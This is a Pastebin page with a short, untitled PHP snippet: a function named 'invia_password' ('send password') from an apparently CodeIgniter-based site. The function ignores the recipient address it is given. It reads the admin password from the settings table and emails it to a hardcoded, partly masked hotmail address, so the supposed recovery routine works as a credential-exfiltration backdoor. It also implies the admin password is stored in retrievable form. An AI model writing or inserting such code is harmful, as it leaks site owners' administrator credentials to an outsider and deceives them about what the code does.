Advertisement
Guest User

Untitled

a guest
May 25th, 2016
52
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. public function invia_password($mail)
  2. {
  3. $data = array();
  4. $query = $this->db->get('impostazioni');
  5. if ($query->num_rows() > 0) {
  6. $data = $query->result_array();
  7. $this->send_email('xxxxxxxxxxxx@hotmail.it', $data[0]['admin_password']);
  8. }
  9.  
  10. return 1;
  11. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement